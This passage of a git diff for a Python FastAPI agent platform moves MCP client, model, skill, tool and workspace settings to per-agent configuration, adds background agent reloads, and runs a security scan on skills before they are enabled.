return _manager().history_backfill_status() + + +@router.post("/history-backfill/run") +async def run_history_backfill_now(): + """Run history backfill immediately regardless of runtime auto-backfill toggle.""" + config = load_config() + _ensure_knowledge_enabled(config) + manager = _manager() + running = config.agents.running + force_running = SimpleNamespace( + knowledge_auto_collect_chat_files=running.knowledge_auto_collect_chat_files, + knowledge_auto_collect_chat_urls=running.knowledge_auto_collect_chat_urls, + knowledge_auto_collect_long_text=running.knowledge_auto_collect_long_text, + knowledge_long_text_min_chars=running.knowledge_long_text_min_chars, + knowledge_chunk_size=running.knowledge_chunk_size, + ) + result = await asyncio.to_thread( + manager.auto_backfill_history_data, + config.knowledge, + force_running, + ) + if result.get("changed"): + save_config(config) + return { + "result": result, + "status": manager.history_backfill_status(), + } + + +@router.get("/memify/jobs/{job_id}") +async def get_memify_job_status(job_id: str): + """Get status of a memify enrichment job.""" + normalized_job_id = (job_id or "").strip() + if not normalized_job_id: + raise HTTPException(status_code=400, detail="MEMIFY_JOB_ID_REQUIRED") + + config = load_config() + _ensure_knowledge_enabled(config) + if not config.knowledge.enabled: + raise HTTPException(status_code=400, detail="KNOWLEDGE_DISABLED") + if not bool(getattr(config.knowledge, "memify_enabled", False)): + raise HTTPException(status_code=400, detail="MEMIFY_DISABLED") + + manager = GraphOpsManager(WORKING_DIR) + payload = manager.get_memify_status(normalized_job_id) + if payload is None: + raise HTTPException(status_code=404, detail="MEMIFY_JOB_NOT_FOUND") + return payload + + +@router.websocket("/history-backfill/progress/ws") +async def stream_history_backfill_progress(websocket: WebSocket): + """Stream history backfill progress to console with WebSocket.""" + await websocket.accept() + interval_ms = _clamp_int( + websocket.query_params.get("interval_ms"), + default=1000, + minimum=300, + maximum=3000, + ) + + last_fingerprint: str | None = None + try: + while True: + progress = _manager().get_history_backfill_progress() + fingerprint = json.dumps( + progress, + ensure_ascii=False, + sort_keys=True, + default=str, + ) + if fingerprint != last_fingerprint: + await websocket.send_json( + { + "type": "snapshot", + "progress": progress, + } + ) + last_fingerprint = fingerprint + await asyncio.sleep(interval_ms / 1000) + except WebSocketDisconnect: + return + + +@router.get("/backup") +async def backup_knowledge(): + manager = _manager() + if not manager.root_dir.exists(): + raise HTTPException(status_code=404, detail="KNOWLEDGE_NOT_FOUND") + + buf = await asyncio.to_thread(_zip_path, manager.root_dir) + timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S") + filename = f"copaw_knowledge_{timestamp}.zip" + return StreamingResponse( + buf, + media_type="application/zip", + headers={ + "Content-Disposition": f'attachment; filename="{filename}"', + }, + ) + + +@router.get("/backup/{source_id}") +async def backup_knowledge_source(source_id: str): + manager = _manager() + source_dir = manager.get_source_storage_dir(source_id) + if not source_dir.exists() or not source_dir.is_dir(): + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + + buf = await asyncio.to_thread(_zip_path, source_dir) + timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S") + safe_name = manager._safe_name(source_id) + filename = f"copaw_knowledge_{safe_name}_{timestamp}.zip" + return StreamingResponse( + buf, + media_type="application/zip", + headers={ + "Content-Disposition": f'attachment; filename="{filename}"', + }, + ) + + +@router.post("/restore") +async def restore_knowledge_backup( + file: UploadFile = File(...), + replace_existing: bool = Query(default=True), +): + if file.content_type and file.content_type not in { + "application/zip", + "application/x-zip-compressed", + "application/octet-stream", + }: + raise HTTPException( + status_code=400, + detail=f"Expected a zip file, got content-type: {file.content_type}", + ) + + data = await file.read() + _validate_zip_data(data) + + manager = _manager() + tmp_dir: Path | None = None + try: + tmp_dir = await asyncio.to_thread(_extract_zip_to_temp, data) + extract_root = _detect_extract_root(tmp_dir) + if not (extract_root / "sources").is_dir(): + raise HTTPException( + status_code=400, + detail="Invalid knowledge backup: missing sources directory", + ) + + if replace_existing and manager.root_dir.exists(): + shutil.rmtree(manager.root_dir, ignore_errors=True) + + manager.root_dir.mkdir(parents=True, exist_ok=True) + for item in extract_root.iterdir(): + dest = manager.root_dir / item.name + if item.is_file(): + shutil.copy2(item, dest) + else: + if dest.exists() and dest.is_file(): + dest.unlink() + shutil.copytree(item, dest, dirs_exist_ok=True) + + manager.sources_dir.mkdir(parents=True, exist_ok=True) + manager.uploads_dir.mkdir(parents=True, exist_ok=True) + manager.remote_blob_dir.mkdir(parents=True, exist_ok=True) + manager.remote_meta_dir.mkdir(parents=True, exist_ok=True) + + config = load_config() + config.knowledge.sources = manager.list_sources_from_storage() + save_config(config) + + return { + "success": True, + "replace_existing": replace_existing, + "restored_sources": len(config.knowledge.sources), + } + finally: + if tmp_dir and tmp_dir.exists(): + shutil.rmtree(tmp_dir, ignore_errors=True) \ No newline at end of file diff --git a/src/copaw/app/routers/mcp.py b/src/copaw/app/routers/mcp.py index e647519be..d5c480925 100644 --- a/src/copaw/app/routers/mcp.py +++ b/src/copaw/app/routers/mcp.py @@ -5,10 +5,9 @@ from typing import Dict, List, Optional, Literal -from fastapi import APIRouter, Body, HTTPException, Path +from fastapi import APIRouter, Body, HTTPException, Path, Request from pydantic import BaseModel, Field -from ...config import load_config, save_config from ...config.config import MCPClientConfig router = APIRouter(prefix="/mcp", tags=["mcp"]) @@ -194,12 +193,18 @@ def _build_client_info(key: str, client: MCPClientConfig) -> MCPClientInfo: response_model=List[MCPClientInfo], summary="List all MCP clients", ) -async def list_mcp_clients() -> List[MCPClientInfo]: +async def list_mcp_clients(request: Request) -> List[MCPClientInfo]: """Get list of all configured MCP clients.""" - config = load_config() + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + mcp_config = agent.config.mcp + if mcp_config is None or not mcp_config.clients: + return [] + return [ _build_client_info(key, client) - for key, client in config.mcp.clients.items() + for key, client in mcp_config.clients.items() ] @@ -208,10 +213,19 @@ async def list_mcp_clients() -> List[MCPClientInfo]: response_model=MCPClientInfo, summary="Get MCP client details", ) -async def get_mcp_client(client_key: str = Path(...)) -> MCPClientInfo: +async def get_mcp_client( + request: Request, + client_key: str = Path(...), +) -> MCPClientInfo: """Get details of a specific MCP client.""" - config = load_config() - client = config.mcp.clients.get(client_key) + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + mcp_config = agent.config.mcp + if mcp_config is None: + raise HTTPException(404, detail=f"MCP client '{client_key}' not found") + + client = mcp_config.clients.get(client_key) if client is None: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") return _build_client_info(client_key, client) @@ -224,14 +238,22 @@ async def get_mcp_client(client_key: str = Path(...)) -> MCPClientInfo: status_code=201, ) async def create_mcp_client( + request: Request, client_key: str = Body(..., embed=True), client: MCPClientCreateRequest = Body(..., embed=True), ) -> MCPClientInfo: """Create a new MCP client configuration.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config, MCPConfig + + agent = await get_agent_for_request(request) + + # Initialize mcp config if not exists + if agent.config.mcp is None: + agent.config.mcp = MCPConfig(clients={}) # Check if client already exists - if client_key in config.mcp.clients: + if client_key in agent.config.mcp.clients: raise HTTPException( 400, detail=f"MCP client '{client_key}' already exists. Use PUT to " @@ -252,9 +274,29 @@ async def create_mcp_client( cwd=client.cwd, ) - # Add to config and save - config.mcp.clients[client_key] = new_client - save_config(config) + # Add to agent's config and save + agent.config.mcp.clients[client_key] = new_client + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return _build_client_info(client_key, new_client) @@ -265,17 +307,21 @@ async def create_mcp_client( summary="Update an MCP client", ) async def update_mcp_client( + request: Request, client_key: str = Path(...), updates: MCPClientUpdateRequest = Body(...), ) -> MCPClientInfo: """Update an existing MCP client configuration.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config - # Check if client exists - existing = config.mcp.clients.get(client_key) - if existing is None: + agent = await get_agent_for_request(request) + + if agent.config.mcp is None or client_key not in agent.config.mcp.clients: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") + existing = agent.config.mcp.clients[client_key] + # Update fields if provided update_data = updates.model_dump(exclude_unset=True) @@ -288,10 +334,30 @@ async def update_mcp_client( merged_data = existing.model_dump(mode="json") merged_data.update(update_data) updated_client = MCPClientConfig.model_validate(merged_data) - config.mcp.clients[client_key] = updated_client + agent.config.mcp.clients[client_key] = updated_client # Save updated config - save_config(config) + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return _build_client_info(client_key, updated_client) @@ -302,18 +368,43 @@ async def update_mcp_client( summary="Toggle MCP client enabled status", ) async def toggle_mcp_client( + request: Request, client_key: str = Path(...), ) -> MCPClientInfo: """Toggle the enabled status of an MCP client.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config - client = config.mcp.clients.get(client_key) - if client is None: + agent = await get_agent_for_request(request) + + if agent.config.mcp is None or client_key not in agent.config.mcp.clients: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") + client = agent.config.mcp.clients[client_key] + # Toggle enabled status client.enabled = not client.enabled - save_config(config) + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return _build_client_info(client_key, client) @@ -324,16 +415,40 @@ async def toggle_mcp_client( summary="Delete an MCP client", ) async def delete_mcp_client( + request: Request, client_key: str = Path(...), ) -> Dict[str, str]: """Delete an MCP client configuration.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config - if client_key not in config.mcp.clients: + agent = await get_agent_for_request(request) + + if agent.config.mcp is None or client_key not in agent.config.mcp.clients: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") # Remove client - del config.mcp.clients[client_key] - save_config(config) + del agent.config.mcp.clients[client_key] + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return {"message": f"MCP client '{client_key}' deleted successfully"} diff --git a/src/copaw/app/routers/providers.py b/src/copaw/app/routers/providers.py index 1fba69b5b..c6af4c1f8 100644 --- a/src/copaw/app/routers/providers.py +++ b/src/copaw/app/routers/providers.py @@ -3,18 +3,29 @@ from __future__ import annotations +import logging from typing import List, Literal, Optional from copy import deepcopy from fastapi import APIRouter, Body, Depends, HTTPException, Path, Request from pydantic import BaseModel, Field +from ..agent_context import get_agent_for_request +from ...config.config import load_agent_config, save_agent_config from ...providers.provider import ProviderInfo, ModelInfo from ...providers.provider_manager import ActiveModelsInfo, ProviderManager +from ...providers.models import ModelSlotConfig + + +logger = logging.getLogger(__name__) router = APIRouter(prefix="/models", tags=["models"]) -ChatModelName = Literal["OpenAIChatModel", "AnthropicChatModel"] +ChatModelName = Literal[ + "OpenAIChatModel", + "AnthropicChatModel", + "GeminiChatModel", +] def get_provider_manager(request: Request) -> ProviderManager: @@ -353,9 +364,37 @@ async def remove_model_endpoint( summary="Get active LLM", ) async def get_active_models( + request: Request, manager: ProviderManager = Depends(get_provider_manager), ) -> ActiveModelsInfo: - return ActiveModelsInfo(active_llm=manager.get_active_model()) + """Get active model (agent-specific or global fallback).""" + # Try to get agent-specific active model + try: + workspace = await get_agent_for_request(request) + logger.debug( + f"get_active_models: got workspace.agent_id={workspace.agent_id}", + ) + agent_config = load_agent_config(workspace.agent_id) + logger.debug( + f"get_active_models: agent_config.active_model=" + f"{agent_config.active_model}", + ) + if agent_config.active_model: + logger.info( + f"Returning agent-specific model for {workspace.agent_id}: " + f"{agent_config.active_model}", + ) + return ActiveModelsInfo(active_llm=agent_config.active_model) + except Exception as e: + logger.warning( + f"Failed to get agent-specific model: {e}", + exc_info=True, + ) + + # Fallback to global active model + global_model = manager.get_active_model() + logger.info(f"Returning global model: {global_model}") + return ActiveModelsInfo(active_llm=global_model) @router.put( @@ -364,17 +403,34 @@ async def get_active_models( summary="Set active LLM", ) async def set_active_model( + request: Request, manager: ProviderManager = Depends(get_provider_manager), body: ModelSlotRequest = Body(...), ) -> ActiveModelsInfo: + """Set active model for current agent.""" + # Validate provider and model exist try: await manager.activate_model(body.provider_id, body.model) except ValueError as exc: message = str(exc) lower_msg = message.lower() if "provider" in lower_msg and "not found" in lower_msg: - # Missing provider raise HTTPException(status_code=404, detail=message) from exc - # Invalid model, unreachable provider, or other configuration error raise HTTPException(status_code=400, detail=message) from exc + + # Save to agent config + try: + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + agent_config.active_model = ModelSlotConfig( + provider_id=body.provider_id, + model=body.model, + ) + save_agent_config(workspace.agent_id, agent_config) + except Exception as e: + # Log warning but don't fail the request + logger.warning( + f"Failed to save active model to agent config: {e}", + ) + return ActiveModelsInfo(active_llm=manager.get_active_model()) diff --git a/src/copaw/app/routers/skills.py b/src/copaw/app/routers/skills.py index 96f2d312f..e3ce12fd9 100644 --- a/src/copaw/app/routers/skills.py +++ b/src/copaw/app/routers/skills.py @@ -1,22 +1,49 @@ # -*- coding: utf-8 -*- import logging from typing import Any -from fastapi import APIRouter, HTTPException +from pathlib import Path +from fastapi import APIRouter, HTTPException, Request +from fastapi.responses import JSONResponse from pydantic import BaseModel, Field from ...agents.skills_manager import ( SkillService, SkillInfo, - list_available_skills, ) from ...agents.skills_hub import ( search_hub_skills, install_skill_from_hub, ) +from ...security.skill_scanner import SkillScanError logger = logging.getLogger(__name__) +def _scan_error_response(exc: SkillScanError) -> JSONResponse: + """Build a 422 response with structured scan findings.""" + result = exc.result + return JSONResponse( + status_code=422, + content={ + "type": "security_scan_failed", + "detail": str(exc), + "skill_name": result.skill_name, + "max_severity": result.max_severity.value, + "findings": [ + { + "severity": f.severity.value, + "title": f.title, + "description": f.description, + "file_path": f.file_path, + "line_number": f.line_number, + "rule_id": f.rule_id, + } + for f in result.findings + ], + }, + ) + + class SkillSpec(SkillInfo): enabled: bool = False @@ -60,32 +87,76 @@ class HubInstallRequest(BaseModel): @router.get("") -async def list_skills() -> list[SkillSpec]: - all_skills = SkillService.list_all_skills() - - available_skills = list_available_skills() - skills_spec = [] - for skill in all_skills: - skills_spec.append( - SkillSpec( - **skill.model_dump(), - enabled=skill.name in available_skills, - ), +async def list_skills( + request: Request, +) -> list[SkillSpec]: + """List all skills for active agent.""" + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + # Get all skills (builtin + customized) + all_skills = skill_service.list_all_skills() + + # Get active skills to determine enabled status + active_skills_dir = workspace_dir / "active_skills" + active_skill_names = set() + if active_skills_dir.exists(): + active_skill_names = { + d.name + for d in active_skills_dir.iterdir() + if d.is_dir() and (d / "SKILL.md").exists() + } + + # Convert to SkillSpec with enabled status + skills_spec = [ + SkillSpec( + name=skill.name, + description=skill.description, + content=skill.content, + source=skill.source, + path=skill.path, + references=skill.references, + scripts=skill.scripts, + enabled=skill.name in active_skill_names, ) + for skill in all_skills + ] + return skills_spec @router.get("/available") -async def get_available_skills() -> list[SkillSpec]: - available_skills = SkillService.list_available_skills() - skills_spec = [] - for skill in available_skills: - skills_spec.append( - SkillSpec( - **skill.model_dump(), - enabled=True, - ), +async def get_available_skills( + request: Request, +) -> list[SkillSpec]: + """List available (enabled) skills for active agent.""" + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + # Get available (active) skills + available_skills = skill_service.list_available_skills() + + # Convert to SkillSpec + skills_spec = [ + SkillSpec( + name=skill.name, + description=skill.description, + content=skill.content, + source=skill.source, + path=skill.path, + references=skill.references, + scripts=skill.scripts, + enabled=True, ) + for skill in available_skills + ] + return skills_spec @@ -118,25 +189,35 @@ def _github_token_hint(bundle_url: str) -> str: @router.post("/hub/install") -async def install_from_hub(request: HubInstallRequest): +async def install_from_hub( + request_body: HubInstallRequest, + request: Request, +): + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + try: result = install_skill_from_hub( - bundle_url=request.bundle_url, - version=request.version, - enable=request.enable, - overwrite=request.overwrite, + workspace_dir=workspace_dir, + bundle_url=request_body.bundle_url, + version=request_body.version, + enable=request_body.enable, + overwrite=request_body.overwrite, ) + except SkillScanError as e: + return _scan_error_response(e) except ValueError as e: detail = str(e) logger.warning( "Skill hub install 400: bundle_url=%s detail=%s", - (request.bundle_url or "")[:80], + (request_body.bundle_url or "")[:80], detail, ) raise HTTPException(status_code=400, detail=detail) from e except RuntimeError as e: - # Upstream hub is flaky/rate-limited sometimes; surface as bad gateway. - detail = str(e) + _github_token_hint(request.bundle_url) + detail = str(e) + _github_token_hint(request_body.bundle_url) logger.exception( "Skill hub install failed (upstream/rate limit): %s", e, @@ -144,7 +225,7 @@ async def install_from_hub(request: HubInstallRequest): raise HTTPException(status_code=502, detail=detail) from e except Exception as e: detail = f"Skill hub import failed: {e}" + _github_token_hint( - request.bundle_url, + request_body.bundle_url, ) logger.exception("Skill hub import failed: %s", e) raise HTTPException(status_code=502, detail=detail) from e @@ -157,48 +238,204 @@ async def install_from_hub(request: HubInstallRequest): @router.post("/batch-disable") -async def batch_disable_skills(skill_name: list[str]) -> None: +async def batch_disable_skills( + skill_name: list[str], + request: Request, +) -> None: + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + for skill in skill_name: - SkillService.disable_skill(skill) + skill_service.disable_skill(skill) @router.post("/batch-enable") -async def batch_enable_skills(skill_name: list[str]) -> None: +async def batch_enable_skills( + skill_name: list[str], + request: Request, +): + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + blocked: list[dict] = [] for skill in skill_name: - SkillService.enable_skill(skill) + try: + skill_service.enable_skill(skill) + except SkillScanError as e: + blocked.append( + { + "skill_name": skill, + "max_severity": e.result.max_severity.value, + "detail": str(e), + }, + ) + if blocked: + return JSONResponse( + status_code=422, + content={ + "type": "security_scan_failed", + "detail": ( + f"{len(blocked)} skill(s) blocked by security scan" + ), + "blocked_skills": blocked, + }, + ) @router.post("") -async def create_skill(request: CreateSkillRequest): - result = SkillService.create_skill( - name=request.name, - content=request.content, - references=request.references, - scripts=request.scripts, - ) +async def create_skill( + request_body: CreateSkillRequest, + request: Request, +): + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + try: + result = skill_service.create_skill( + name=request_body.name, + content=request_body.content, + references=request_body.references, + scripts=request_body.scripts, + ) + except SkillScanError as e: + return _scan_error_response(e) return {"created": result} @router.post("/{skill_name}/disable") -async def disable_skill(skill_name: str): - result = SkillService.disable_skill(skill_name) - return {"disabled": result} +async def disable_skill( + skill_name: str, + request: Request = None, +): + """Disable skill for active agent.""" + from ..agent_context import get_agent_for_request + import shutil + import asyncio + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + active_skill_dir = workspace_dir / "active_skills" / skill_name + + if active_skill_dir.exists(): + shutil.rmtree(active_skill_dir) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + logger.warning(f"Background reload failed: {e}") + + asyncio.create_task(reload_in_background()) + + return {"disabled": True} + + return {"disabled": False} @router.post("/{skill_name}/enable") -async def enable_skill(skill_name: str): - result = SkillService.enable_skill(skill_name) - return {"enabled": result} +async def enable_skill( + skill_name: str, + request: Request = None, +): + """Enable skill for active agent.""" + from ..agent_context import get_agent_for_request + import shutil + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + active_skill_dir = workspace_dir / "active_skills" / skill_name + + # If already enabled, skip + if active_skill_dir.exists(): + return {"enabled": True} + + # Find skill from builtin or customized + builtin_skill_dir = ( + Path(__file__).parent.parent.parent / "agents" / "skills" / skill_name + ) + customized_skill_dir = workspace_dir / "customized_skills" / skill_name + + source_dir = None + if customized_skill_dir.exists(): + source_dir = customized_skill_dir + elif builtin_skill_dir.exists(): + source_dir = builtin_skill_dir + + if not source_dir or not (source_dir / "SKILL.md").exists(): + raise HTTPException( + status_code=404, + detail=f"Skill '{skill_name}' not found", + ) + + # --- Security scan (pre-activation) -------------------------------- + try: + from ...security.skill_scanner import scan_skill_directory + + scan_skill_directory(source_dir, skill_name=skill_name) + except SkillScanError as e: + return _scan_error_response(e) + except Exception as scan_exc: + logger.warning( + "Security scan error for skill '%s' (non-fatal): %s", + skill_name, + scan_exc, + ) + # ------------------------------------------------------------------- + + # Copy to active_skills + shutil.copytree(source_dir, active_skill_dir) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + logger.warning(f"Background reload failed: {e}") + + asyncio.create_task(reload_in_background()) + + return {"enabled": True} @router.delete("/{skill_name}") -async def delete_skill(skill_name: str): +async def delete_skill( + skill_name: str, + request: Request, +): """Delete a skill from customized_skills directory permanently. This only deletes skills from customized_skills directory. Built-in skills cannot be deleted. """ - result = SkillService.delete_skill(skill_name) + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + result = skill_service.delete_skill(skill_name) return {"deleted": result} @@ -207,6 +444,7 @@ async def load_skill_file( skill_name: str, source: str, file_path: str, + request: Request, ): """Load a specific file from a skill's references or scripts directory. @@ -226,7 +464,13 @@ async def load_skill_file( GET /skills/builtin_skill/files/builtin/scripts/utils/helper.py """ - content = SkillService.load_skill_file( + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + content = skill_service.load_skill_file( skill_name=skill_name, file_path=file_path, source=source, diff --git a/src/copaw/app/routers/tools.py b/src/copaw/app/routers/tools.py index 1f334b3f5..b88336d0e 100644 --- a/src/copaw/app/routers/tools.py +++ b/src/copaw/app/routers/tools.py @@ -5,10 +5,15 @@ from typing import List -from fastapi import APIRouter, HTTPException, Path +from fastapi import ( + APIRouter, + HTTPException, + Path, + Request, +) from pydantic import BaseModel, Field -from ...config import load_config, save_config +from ...config import load_config router = APIRouter(prefix="/tools", tags=["tools"]) @@ -22,20 +27,33 @@ class ToolInfo(BaseModel): @router.get("", response_model=List[ToolInfo]) -async def list_tools() -> List[ToolInfo]: - """List all built-in tools and their enabled status. +async def list_tools( + request: Request, +) -> List[ToolInfo]: + """List all built-in tools and enabled status for active agent. Returns: List of tool information """ - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import load_agent_config + + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) # Ensure tools config exists with defaults - if not hasattr(config, "tools"): - config.tools = {} + if not agent_config.tools or not agent_config.tools.builtin_tools: + # Fallback to global config if agent config has no tools + config = load_config() + tools_config = config.tools if hasattr(config, "tools") else None + if not tools_config: + return [] + builtin_tools = tools_config.builtin_tools + else: + builtin_tools = agent_config.tools.builtin_tools tools_list = [] - for tool_config in config.tools.builtin_tools.values(): + for tool_config in builtin_tools.values(): tools_list.append( ToolInfo( name=tool_config.name, @@ -48,11 +66,15 @@ async def list_tools() -> List[ToolInfo]: @router.patch("/{tool_name}/toggle", response_model=ToolInfo) -async def toggle_tool(tool_name: str = Path(...)) -> ToolInfo: - """Toggle tool enabled status. +async def toggle_tool( + tool_name: str = Path(...), + request: Request = None, +) -> ToolInfo: + """Toggle tool enabled status for active agent. Args: tool_name: Tool function name + request: FastAPI request Returns: Updated tool information @@ -60,21 +82,49 @@ async def toggle_tool(tool_name: str = Path(...)) -> ToolInfo: Raises: HTTPException: If tool not found """ - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import load_agent_config, save_agent_config + + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) - if tool_name not in config.tools.builtin_tools: + if ( + not agent_config.tools + or tool_name not in agent_config.tools.builtin_tools + ): raise HTTPException( status_code=404, detail=f"Tool '{tool_name}' not found", ) # Toggle enabled status - tool_config = config.tools.builtin_tools[tool_name] + tool_config = agent_config.tools.builtin_tools[tool_name] tool_config.enabled = not tool_config.enabled - # Save config - save_config(config) + # Save agent config + save_agent_config(workspace.agent_id, agent_config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + # Return immediately (optimistic update) return ToolInfo( name=tool_config.name, enabled=tool_config.enabled, diff --git a/src/copaw/app/routers/workspace.py b/src/copaw/app/routers/workspace.py index e93f9e5b2..94bf7e0a9 100644 --- a/src/copaw/app/routers/workspace.py +++ b/src/copaw/app/routers/workspace.py @@ -11,10 +11,9 @@ from datetime import datetime, timezone from pathlib import Path -from fastapi import APIRouter, HTTPException, UploadFile, File +from fastapi import APIRouter, HTTPException, UploadFile, File, Request from fastapi.responses import StreamingResponse -from ...constant import WORKING_DIR router = APIRouter(prefix="/workspace", tags=["workspace"]) @@ -54,7 +53,7 @@ def _zip_directory(root: Path) -> io.BytesIO: # --------------------------------------------------------------------------- -def _validate_zip_data(data: bytes) -> None: +def _validate_zip_data(data: bytes, workspace_dir: Path) -> None: """Ensure *data* is a valid zip without path-traversal entries.""" if not zipfile.is_zipfile(io.BytesIO(data)): raise HTTPException( @@ -63,16 +62,16 @@ def _validate_zip_data(data: bytes) -> None: ) with zipfile.ZipFile(io.BytesIO(data)) as zf: for name in zf.namelist(): - resolved = (WORKING_DIR / name).resolve() - if not str(resolved).startswith(str(WORKING_DIR)): + resolved = (workspace_dir / name).resolve() + if not str(resolved).startswith(str(workspace_dir)): raise HTTPException( status_code=400, detail=f"Zip contains unsafe path: {name}", ) -def _extract_and_merge_zip(data: bytes) -> None: - """Extract zip data and merge into WORKING_DIR (blocking operation).""" +def _extract_and_merge_zip(data: bytes, workspace_dir: Path) -> None: + """Extract zip data and merge into workspace_dir (blocking operation).""" tmp_dir = None try: tmp_dir = Path(tempfile.mkdtemp(prefix="copaw_upload_")) @@ -84,10 +83,10 @@ def _extract_and_merge_zip(data: bytes) -> None: if len(top_entries) == 1 and top_entries[0].is_dir(): extract_root = top_entries[0] - WORKING_DIR.mkdir(parents=True, exist_ok=True) + workspace_dir.mkdir(parents=True, exist_ok=True) for item in extract_root.iterdir(): - dest = WORKING_DIR / item.name + dest = workspace_dir / item.name if item.is_file(): shutil.copy2(item, dest) else: @@ -99,10 +98,10 @@ def _extract_and_merge_zip(data: bytes) -> None: shutil.rmtree(tmp_dir, ignore_errors=True) -def _validate_and_extract_zip(data: bytes) -> None: +def _validate_and_extract_zip(data: bytes, workspace_dir: Path) -> None: """Validate and extract zip data (blocking operation).""" - _validate_zip_data(data) - _extract_and_merge_zip(data) + _validate_zip_data(data, workspace_dir) + _extract_and_merge_zip(data, workspace_dir) # --------------------------------------------------------------------------- @@ -114,28 +113,33 @@ def _validate_and_extract_zip(data: bytes) -> None: "/download", summary="Download workspace as zip", description=( - "Package the entire WORKING_DIR into a zip archive and stream it " - "back as a downloadable file." + "Package the entire agent workspace into a zip archive and stream " + "it back as a downloadable file." ), responses={ 200: { "content": {"application/zip": {}}, - "description": "Zip archive of WORKING_DIR", + "description": "Zip archive of agent workspace", }, }, ) -async def download_workspace(): - """Stream WORKING_DIR as a zip file.""" - if not WORKING_DIR.is_dir(): +async def download_workspace(request: Request): + """Stream agent workspace as a zip file.""" + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + workspace_dir = agent.workspace_dir + + if not workspace_dir.is_dir(): raise HTTPException( status_code=404, - detail=f"WORKING_DIR does not exist: {WORKING_DIR}", + detail=f"Workspace does not exist: {workspace_dir}", ) - buf = await asyncio.to_thread(_zip_directory, WORKING_DIR) + buf = await asyncio.to_thread(_zip_directory, workspace_dir) timestamp = 